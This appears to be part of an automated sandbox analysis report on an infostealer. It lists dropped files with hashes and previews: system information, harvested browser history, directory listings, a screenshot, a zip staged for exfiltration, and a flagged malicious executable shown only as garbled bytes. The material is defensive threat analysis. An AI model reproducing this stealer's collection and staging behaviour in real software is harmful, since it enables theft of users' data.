Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\ProgramData\134349\FileGrabber\Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\ProgramData\134349\FileGrabber\Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\ProgramData\134349\Information.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	666
Entropy (8bit):	4.1767529471416305
Encrypted:	false
SSDEEP:	12:pYzZfpfafETeoJtiAcYVmdy7NuhNNONA6r:psZfBafEVUYV97yNNOK4
MD5:	E53361E9619346019167BF01B27D83C3
SHA1:	1B56B44AC508244A65B51FD917457F4F16D7EFC5
SHA-256:	14EE59FBE12E32BF2913317141D71A477CEA5D6F74BAAD293FA7A0FCA7286ED3
SHA-512:	E6B30C41B536BEC08CF1D644FD0CB22427B297096E35C2EE058C0DDE6F2EE352C83C5DDD9566CD04ACFE64605C4BC094B433566B4EB5D23374298CA1E76C2CC5
Malicious:	false
Reputation:	unknown
Preview:	==================================================. Operating system : Windows 10 Pro (64 Bit). PC user : 134349/user. ClipBoard : . Launch : C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe. ==================================================. Screen resolution : 1280x1024. Current time : 07/07/2024 12:52:20. HWID : 3408D440A4. ==================================================. CPU : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz. RAM : 4094MB. GPU : 1BUBDD. ==================================================. IP Geolocation : 8.46.123.33 [United States]. Log Date : 07/06/2024 7:27. BSSID : 00:50:56:a7:21:15. ==================================================

C:\ProgramData\134349\InstalledSoftware.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	241
Entropy (8bit):	5.130503875493093
Encrypted:	false
SSDEEP:	6:LO8aRH+39z3q9oH+3GIdKeSuPUOJlgPN3dwbFquqs3o:idRH+5+zd6uPUycUhW
MD5:	2CC99D7F6F68BDCF8752EF80DE256794
SHA1:	0EDB2377502E584BED20FE28001A964F6B8E66D9
SHA-256:	938DE1066B196DEDE78E7B82098436062335D3A9F568C6C65B15AC0E70509AEC
SHA-512:	8C677FF4B66C38F841594D3B8C5F4A9D1BD02E1E59C0E91EFB4BB05C5A8F9F21BDFB93CC3A73439CF9558E367DD9C157348C391904DAED57DCE9CCB17F3CE352
Malicious:	false
Reputation:	unknown
Preview:	Google Chrome..Microsoft Edge..Microsoft Edge Update..Microsoft Edge WebView2 Runtime..Java Auto Updater..Java 8 Update 381..Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532..Office 16 Click-to-Run Extensibility Component..

C:\ProgramData\134349\Process.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	14758
Entropy (8bit):	5.565076862729123
Encrypted:	false
SSDEEP:	96:O6OyMtMyMIm8w9qDiteO7BDM7MSMMtMgQ:OUMtMyMIAgOtekDM7MfMtMgQ
MD5:	656EA2C9B68F172046846E91335AEDA2
SHA1:	5FE85471E5BEB17C3B5C368BF20153338C185BDB
SHA-256:	058AF2C2CA34760308CF10656054032816D22097B9261E83BAF3A67045BBE3DD
SHA-512:	68662F0E29107192D8C86E2DCFE3330DA22BB1AD0945B4968B2617667273FF9E1CC900E99E94C0C62E7F3BA7F1D5B023E70C0D98947C1FEEA1AB912E66E6F66E
Malicious:	false
Reputation:	unknown
Preview:	NAME: svchost.EXE: ..NAME: explorer.EXE: C:\Windows\Explorer.EXE..NAME: WmiPrvSE.EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: dllhost.EXE: C:\Windows\system32\DllHost.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: fontdrvhost.EXE: ..NAME: smartscreen.EXE: C:\Windows\System32\smartscreen.exe..NAME: svchost.EXE: ..NAME: svchost.EXE: ..NAME: csrss.EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: svchost.EXE: ..NAME: sihost.EXE: C:\Windows\system32\sihost.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\Wnbvwn

C:\ProgramData\134349\Screen.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	600735
Entropy (8bit):	7.9414131183196
Encrypted:	false
SSDEEP:	12288:NQXRS5TgTxOrUcvYrSnYqv4Jsduat3HFCN4aWVsVk1B7oTLG2CG7R7:NQXR/OLKSYqrb3kSXmOBUXG2CS7
MD5:	3D65115D06059C5DE3C57BFD97520291
SHA1:	375C87AB5F12C1D328B69A0BAEC57048FBF213FC
SHA-256:	F98E0CF1C898F86EE38AFCD23C153D621326200A4F952729C27504B35B60D498
SHA-512:	6A1B0AC692B328C077B241A38A940AB3092EE9855A1B69322418575A309D1CEFB6B5907C442007F743A46B9D885BAEC08F75C03C67E40490F8F574A43202C44E
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.........n.d.u....^.s.}..6f....d.1f6 ..B.1.......@Hh.1.....OVd........xVfFDF.....]........p.8r\z.....1zE.a..Y..h?.^.s7..1./....x...L_.B...E..CYzq>F/~>.K/.`V..+.)Y.G..{.......<w5.-..,=;.W..3s...k..........lY.."..8%....gc......>...r..d:.6+...\......r.._%?...,O.._..........C..0.r.z.......eY.5>_..l3.s..$..=.g.....\..9k....f...........R.{.5.70.6= ...1/,.......5Xy@......}...&....${...}.+..9.,.....9..{q.L...I.....0n....).5...@."&`....\|.n.ih~W..<.c+.s...+s_.{`../...o...#X.y"d...8.q\.6..@.z/kV..6a......[F...s....+h....../.u\Y...Q....u....v.'`..u....."g.6......b\.K. .=....Io.s...z]...k...1...~..5...yTc...p-...r..6V.+..^..=.#...._.%9.#...}lE..E....S.w...O.,..N.k`...>...u.Go.5.q.\|.....Y.X.,.qT.[....e.F?..z...!9a...+[%.=.[.]~.U.9..a.=@c....~.o.&?...5=...\|OP\......e...^.k..o.Sz.>.)z...'....M..#2._r...9..=e.bR.".?.iF....f..t..I...[...Q.......:...1.!.;.........Z.......

C:\ProgramData\KMSAuto\accc.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	631296
Entropy (8bit):	7.5120496811594455
Encrypted:	false
SSDEEP:	12288:22QRXDD1yed0fsU4GSWgOvPESGj4s32xEdRCSHsjAZi96VG6wl:22Q9NXw2/wPOjdGxYADEVU
MD5:	BED8CDCED2D57BE2BD750F0F59991ECD
SHA1:	4E2A885B9387FCF040B7EB79892DE2F9FE55BCA4
SHA-256:	5F628663F71E3BAA55F10E6021597F7860BEF868284EB50B8958169DCBBFF4FD
SHA-512:	B85990A778C2462D57C3B314270BD1F397749450E75508E1012A14F21661358B98021EFB791F694D9EB05F49B0776EA3FF4C803F842F858DB5669968C477433F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 56%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........g...N..........(L...............................................(p.....(.....s ...z.z.,..{$...,..{$...o......(....s.....%....s.........(.....(E...Z.~....~(...o+...(@...j~'...o+...('...(P...(\....s...../....(S....(-...~r...p(.....3...r...p(.....4...rsJ....5...~5.....oK....6...b~8...,.~8...o......8....(....-..........s.....o....(.......P...s....(....tk...(.... ....(....~r...p(.....J...r...p(.....K.....(...+.o^...-....(...+oh....K...J.o....%(....

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.307357139762978
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr5:KooCEYhgYEL0In
MD5:	903B35CC93140E6701E12935809482FF
SHA1:	151945AE040484CD8091AC5F2B9219AFF3B4BB5C
SHA-256:	9C0C945FDF7870B6862697380E5E3499CC5508B04FAAC0A88285D4F1A205979C
SHA-512:	83077F4889CD1FFABFED699E1B0AF06C28F18FD33E54F46208E97DDDFD96DB1014715CB305948B3E4FCE0C0F6769F2040121DE542F789264E39B63EA400D00D4
Malicious:	false
Reputation:	unknown
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xde0513c7, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42216414813644
Encrypted:	false
SSDEEP:	1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
MD5:	683EB41DA3AE4EC53C58486649FEDCE9
SHA1:	6B0223566587A0E1F4C088FE4A8115E0664A41E6
SHA-256:	5D3AD4059377B79F3DAAA005B6A091B24F372FB8BA0DF7DCBC521A23627AC472
SHA-512:	D7B1C03C3874D4AA29B12E1892697BB796A0261E7E2C136C411A61FEED8688634A0A947113431F5974C64892BA87EF044CDF95818F9545D0DAA6B6A8F1717FF9
Malicious:	false
Reputation:	unknown
Preview:	....... .......A.......X\...;...{......................0.!..........{A......\|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.....................................r.....\|..................i.\|......\|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07641219172467485
Encrypted:	false
SSDEEP:	3:j1KYeZYZUWjn13a/euj6UwllcVO/lnlZMxZNQl:pKzZ0L53qeFLOewk
MD5:	B864108CFE7D4CEC44C856FF718BB304
SHA1:	3F90EB86312F577F277037DBD04C154372CAF73E
SHA-256:	A8161629D3CB7A0726503724281DB4BEEC4F46F5A1E880526C512D1D1DCACA70
SHA-512:	64F652A607FEC420AC6F48846546EEA075155A0F2D9A5FEB8C523ADB0221EE34B63AB0EF0962C5BCBC8272338CDA3EFBC316F7D9B5429DAC68822CD52D461D97
Malicious:	false
Reputation:	unknown
Preview:	Z_......................................;...{.......\|.......{A..............{A......{A..........{A]................i.\|......\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\27f773de48be97a40fce96c7715ed463\msgid.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	unknown
Preview:	0

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	modified
Size (bytes):	142139
Entropy (8bit):	7.9197584607150535
Encrypted:	false
SSDEEP:	3072:F3JgVmHKmfMMhQR63uGXg84CmnIGuhx5355TwvuYn+AH:gVmHKMMMSR63uog8tmnIL5Xwmw3
MD5:	89ED2F8ACFB6F72DF9919D57B66367B1
SHA1:	64B838CE73234B6F94FCA685D5D6C415F880CE3F
SHA-256:	92CAE5D67E4671AFF04B13ED652AFC687702B52C9A558D24A692DFE4CA1E9F39
SHA-512:	D0381CE44C584345B0377ECDCD694BAA47435F7DFC2BC2D5E55C3AD1D14A7F97A7FFBC78E9DD2121478DAA1B55DE53578C0D8075D90B2F5FF9A66F58DDAE4558
Malicious:	false
Reputation:	unknown
Preview:	PK.........Q.X................Browsers\Edge\PK........o;.XQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK........o;.Xc.e.S...^.......Browsers\Firefox\History.txtSVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.3''QA..L#.....J_...\/.".._........_....1M_S....PK........o;.X..[.s...q.......Browsers\Google\History.txt..j.0...{.C.l.5..?(..9.m......&?..C.....l=..6.^..H.'K.e......V..R.\O...\|_....}..<.....2%......+$s...q.2.F..W....z.F...97.....S9..@.j.Jn.+7$....%!.q.C..+ .O...N.\-.zZ.W.....2../w.!..N...d.dj$..L..H...dJ.OI.K6E/9..\|.4i..A.y..)....9.)8P...5..O...J.M\gs.g>q......e....B..#....r...@.l.C ..(.....>K.wB........a.G..B.....Y.O..g....Z6..b......P....0.0...a_..PK........o;.X1.#.>...5.......Directories\Desktop.txteR.n. .\|.I..4i.@.....PI.vm.w.m.?..V..ycN...C....:.??E......8 ..&.J...0Bv....H+\%EW.6...8s$...a..&.7.....<...B...g.,$hw.ad..D..+4.n.QcM^'8I[4\.?.u.k.7,h....k......B.+o3...dEq...W..D"....+5.WZ.f.

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Browsers\Firefox\Bookmarks.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Reputation:	unknown
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Browsers\Firefox\History.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.886397362842801
Encrypted:	false
SSDEEP:	3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
MD5:	61CDD7492189720D58F6C5C975D6DFBD
SHA1:	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
SHA-256:	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
SHA-512:	20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
Malicious:	false
Reputation:	unknown
Preview:	### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Browsers\Google\History.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1393
Entropy (8bit):	5.241470443395582
Encrypted:	false
SSDEEP:	24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
MD5:	7F24357FFA354F2471DED45552B897D7
SHA1:	1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
SHA-256:	573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
SHA-512:	202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
Malicious:	false
Reputation:	unknown
Preview:	### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Directories\Desktop.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	821
Entropy (8bit):	5.2651980330864605
Encrypted:	false
SSDEEP:	24:EF3IgqkOTRfMnaD/lvsoYduOVdPXrvaI1w0+mwGD/mF3FYdOeeu:ECfbRfBrOuudP3ZrmB4Oeeu
MD5:	8BB6C23828842E60AD5CED543BF93F9D
SHA1:	FF35F3F5EBBFEDF9988E1CE74EEFFC16878FAFC6
SHA-256:	1B720EAD77E6D146B534367355FFE2316046CB071A7DFBC5D41C6E1ED50D1B10
SHA-512:	AE4BF3525C59F74077FB5041D30AA1AC5FACCA58C8A00B7882B43E3B0457A9C4757723E2F492DF4B9B8AE057710578DF2EFD9BF3183EACEE68A705B62695E5EE
Malicious:	false
Reputation:	unknown
Preview:	Desktop\...BPMLNOBVSB\...DVWHKMNFNN\...LTKMYBSEYZ\...ONBQCLYSPU\....HTAGVDFUIE.pdf....KZWFNRXYKI.mp3....LTKMYBSEYZ.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.xlsx....WUTJSCBCFX.png...UOOJJOZIRH\...VLZDGUKUTZ\....FENIVHOIKN.mp3....HTAGVDFUIE.xlsx....KZWFNRXYKI.jpg....NIKHQAIQAU.png....NWTVCDUMOB.pdf....VLZDGUKUTZ.docx...XZXHAVGRAG\....HTAGVDFUIE.mp3....KATAXZVCPS.png....ONBQCLYSPU.xlsx....UMMBDNEQBN.jpg....VLZDGUKUTZ.pdf....XZXHAVGRAG.docx...ZBEDCJPBEY\...ZTGJILHXQB\...desktop.ini...Excel.lnk...FENIVHOIKN.mp3...HTAGVDFUIE.mp3...HTAGVDFUIE.pdf...HTAGVDFUIE.xlsx...KATAXZVCPS.png...KZWFNRXYKI.jpg...KZWFNRXYKI.mp3...LTKMYBSEYZ.jpg...NIKHQAIQAU.png...NWTVCDUMOB.pdf...ONBQCLYSPU.docx...ONBQCLYSPU.xlsx...UMMBDNEQBN.jpg...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...VLZDGUKUTZ.pdf...WUTJSCBCFX.png...xj40xovMsm.exe...XZXHAVGRAG.docx..

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Directories\Documents.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	834
Entropy (8bit):	5.30276653598512
Encrypted:	false
SSDEEP:	24:oF3IgqkOTRfMnaD/lvsoYduOVhvaI1w0+mwGD/mF3FYdOeR:oCfbRfBrOuudZrmB4OeR
MD5:	3E77FD5851164F7116CA1DE185B21926
SHA1:	B03D5601F6E6DC15B54F82C854A49C0BCA45214C
SHA-256:	F71D584001783610360FC7294A824FF60435453CD7304DD204474B505EB70413
SHA-512:	5A4C0555321CD50086A0A14A57FDDE961E3A95E55944377FF3E9EAFEDE8007001CC842F290EA9B85DD551DC1911CF34E921A417A25CDB2C550BABD0796ED0269
Malicious:	false
Reputation:	unknown
Preview:	Documents\...BPMLNOBVSB\...DVWHKMNFNN\...LTKMYBSEYZ\...My Music\...My Pictures\...My Videos\...ONBQCLYSPU\....HTAGVDFUIE.pdf....KZWFNRXYKI.mp3....LTKMYBSEYZ.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.xlsx....WUTJSCBCFX.png...UOOJJOZIRH\...VLZDGUKUTZ\....FENIVHOIKN.mp3....HTAGVDFUIE.xlsx....KZWFNRXYKI.jpg....NIKHQAIQAU.png....NWTVCDUMOB.pdf....VLZDGUKUTZ.docx...XZXHAVGRAG\....HTAGVDFUIE.mp3....KATAXZVCPS.png....ONBQCLYSPU.xlsx....UMMBDNEQBN.jpg....VLZDGUKUTZ.pdf....XZXHAVGRAG.docx...ZBEDCJPBEY\...ZTGJILHXQB\...desktop.ini...FENIVHOIKN.mp3...HTAGVDFUIE.mp3...HTAGVDFUIE.pdf...HTAGVDFUIE.xlsx...KATAXZVCPS.png...KZWFNRXYKI.jpg...KZWFNRXYKI.mp3...LTKMYBSEYZ.jpg...NIKHQAIQAU.png...NWTVCDUMOB.pdf...ONBQCLYSPU.docx...ONBQCLYSPU.xlsx...UMMBDNEQBN.jpg...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...VLZDGUKUTZ.pdf...WUTJSCBCFX.png...XZXHAVGRAG.docx..

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Directories\Downloads.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.285684426154722
Encrypted:	false
SSDEEP:	6:3tSLKJswhjzAhjHs1j0/eyPcMuhOLt7ydsd+kGDysmFEKTFYd/r53raj7IsNubSM:QLKJsqvaI1w/8wLmwGDysmFEKTFYdjxL
MD5:	8309266C95CA0536FA7C7D24DD510A68
SHA1:	1B5FEF428E41596A839B7C8C5113F351562C7F86
SHA-256:	70FEC1166A36BC10FD82C09C5380E24DA6E673AD02CCC57110501684865360C8
SHA-512:	0761522F3023B5E91636645F0CC2807B1DA8AB42D25036FD0259811F8D8CABDC6107AD3253690B377CD997849C031B46DAB14D494C5597E3D55905A2622D4215
Malicious:	false
Reputation:	unknown
Preview:	Downloads\...desktop.ini...FENIVHOIKN.mp3...HTAGVDFUIE.mp3...HTAGVDFUIE.pdf...HTAGVDFUIE.xlsx...KATAXZVCPS.png...KZWFNRXYKI.jpg...KZWFNRXYKI.mp3...LTKMYBSEYZ.jpg...NIKHQAIQAU.png...NWTVCDUMOB.pdf...ONBQCLYSPU.docx...ONBQCLYSPU.xlsx...UMMBDNEQBN.jpg...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...VLZDGUKUTZ.pdf...WUTJSCBCFX.png...XZXHAVGRAG.docx..

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Reputation:	unknown
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Directories\Pictures.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
